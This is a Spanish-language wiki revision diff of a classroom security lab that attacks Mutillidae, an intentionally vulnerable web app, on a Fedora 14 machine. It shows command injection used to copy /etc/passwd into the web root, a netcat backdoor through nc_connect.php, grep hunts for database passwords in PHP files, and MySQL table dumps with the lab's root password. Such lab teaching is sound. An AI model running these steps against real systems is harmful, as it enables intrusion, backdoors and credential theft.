Herramientas de usuario
sad:fedora14:p3
Diferencias
Muestra las diferencias entre dos versiones de la página.
| Ambos lados, revisión anterior Revisión previa Próxima revisión | Revisión previa | ||
|
sad:fedora14:p3 [2018/02/08 18:01] José Manuel Guallar |
sad:fedora14:p3 [2019/01/04 13:18] (actual) |
||
|---|---|---|---|
| Línea 56: | Línea 56: | ||
| Esto permitirá que dos procesos se conecten a netcat. | Esto permitirá que dos procesos se conecten a netcat. | ||
| - | nc -l 4444, le dice a netcat que escuche y permita conexiones en el puerto 4444. | + | **nc -l 4444,** le dice a netcat que escuche y permita conexiones en el puerto 4444. |
| Línea 98: | Línea 98: | ||
| ''**uname -a**'' | ''**uname -a**'' | ||
| - | muestra informacion del sistema operatico | + | muestra informacion del sistema operativo |
| - | '' | + | |
| - | **cat /etc/passwd > passwd.txt**'' | + | ''**cat /etc/passwd > passwd.txt**'' |
| crea passwd.txt localizado en /var/www/html/multillidae | crea passwd.txt localizado en /var/www/html/multillidae | ||
| - | ''ls -l $PWD/passwd.txt'' | + | ''**ls -l $PWD/passwd.txt**'' |
| lista el fichero passwd.txt | lista el fichero passwd.txt | ||
| Línea 112: | Línea 112: | ||
| **volvemos al Firefox y abrimos otra pestaña y escribimos** | **volvemos al Firefox y abrimos otra pestaña y escribimos** | ||
| - | http://ip-fedora/mutillidae/passwd.txt | + | ''** http://ip-fedora/mutillidae/passwd.txt**'' |
| {{:sad:fedora:p3:06.png?500|}} | {{:sad:fedora:p3:06.png?500|}} | ||
| Línea 133: | Línea 133: | ||
| {{:sad:fedora:p3:07.png?500|}} | {{:sad:fedora:p3:07.png?500|}} | ||
| - | http://ip-fedora/mutillidae/nc_connect.php | + | ''**http://ip-fedora/mutillidae/nc_connect.php**'' |
| - | Ejecutamos nc_connect.php | + | Ejecutamos **nc_connect.php** |
| - | http://ip-fedora/mutillidae/nc_connect.php | + | ''**http://ip-fedora/mutillidae/nc_connect.php**'' |
| veremos que en la web pone conectando..... | veremos que en la web pone conectando..... | ||
| Línea 145: | Línea 145: | ||
| <code bash> | <code bash> | ||
| - | root@bt:~# nc 192.168.1.111 3333 | + | root@bt:~# nc 192.168.153.39 3333 |
| whoami | whoami | ||
| ps -eaf | egrep '(3333|4444)' | ps -eaf | egrep '(3333|4444)' | ||
| </code> | </code> | ||
| + | |||
| {{:sad:fedora:p3:08.png?500|}} | {{:sad:fedora:p3:08.png?500|}} | ||
| {{:sad:fedora:p3:09.png?500|}} | {{:sad:fedora:p3:09.png?500|}} | ||
| - | las dos primeras lineas es la ejecución del netcat via nslookup | + | Las dos primeras lineas es la ejecución del netcat via nslookup |
| las ultimas lineas el la puerta trasera | las ultimas lineas el la puerta trasera | ||
| Línea 163: | Línea 164: | ||
| ''**pwd**'' | ''**pwd**'' | ||
| - | luego vamos a contar los scripts | + | luego vamos a contar los scripts\\ |
| - | '' | + | |
| - | **find * -name "*.php" | wc -l**'' | + | |
| - | despues vamos a contar los archivos include de php | + | ''**find * -name "*.php" | wc -l**'' |
| - | '' | + | |
| - | **find * -name "*.inc" | wc -l**'' | + | despues vamos a contar los archivos incluye de php\\ |
| + | |||
| + | ''**find * -name "*.inc" | wc -l**'' | ||
| + | |||
| + | lo siguiente sera buscar en cada archivo include (.inc) las palabras "password" "db" o "database"\\ | ||
| - | lo siguiente sera buscar en cada archivo include (.inc) las palabras "password" "db" o "database" | ||
| {{:sad:fedora:p3:10.png?500|}} | {{:sad:fedora:p3:10.png?500|}} | ||
| + | |||
| <code bash> | <code bash> | ||
| find * -name "*.inc" | xargs grep -i password | egrep -i '(db|database)' | find * -name "*.inc" | xargs grep -i password | egrep -i '(db|database)' | ||
| Línea 190: | Línea 193: | ||
| find * -name "*.php" | xargs grep -i password | egrep -i '(db|database)' | grep "=" | head -8 | find * -name "*.php" | xargs grep -i password | egrep -i '(db|database)' | grep "=" | head -8 | ||
| </code> | </code> | ||
| + | |||
| {{:sad:fedora:p3:12.png?500|}} | {{:sad:fedora:p3:12.png?500|}} | ||
| ahora buscamos lo mismo pero solo mostramos las 8 primeras lineas de la cabecera, y observamos que el nombre del script que contiene la contraseña de la Base de datos es MySQLHandler.php | ahora buscamos lo mismo pero solo mostramos las 8 primeras lineas de la cabecera, y observamos que el nombre del script que contiene la contraseña de la Base de datos es MySQLHandler.php | ||
| Línea 206: | Línea 210: | ||
| echo "use nowasp; show tables;" | mysql -uroot -psamurai | echo "use nowasp; show tables;" | mysql -uroot -psamurai | ||
| </code> | </code> | ||
| + | |||
| {{:sad:fedora:p3:14.png?500|}} | {{:sad:fedora:p3:14.png?500|}} | ||
| - | vamos a investigar el contenido de la tabla accounts | + | Vamos a investigar el contenido de la tabla accounts |
| primer comando enseña los campos por columnas y por supuesto podemos ver el contenido de tablas | primer comando enseña los campos por columnas y por supuesto podemos ver el contenido de tablas | ||
| Línea 231: | Línea 236: | ||
| ''** print de pantalla final**'' | ''** print de pantalla final**'' | ||
| - | Tienes que realizar los siguientes pasos en el terminal de netcat nc_config.php | + | Tienes que realizar los siguientes pasos en el terminal de netcat nc_connect.php |
| <code bash> | <code bash> | ||
sad/fedora14/p3.1518112911.txt.gz · Última modificación: 2019/01/04 13:18 (editor externo)
Herramientas de la página
Excepto donde se indique lo contrario, el contenido de este wiki esta bajo la siguiente licencia: CC Attribution-Share Alike 4.0 International
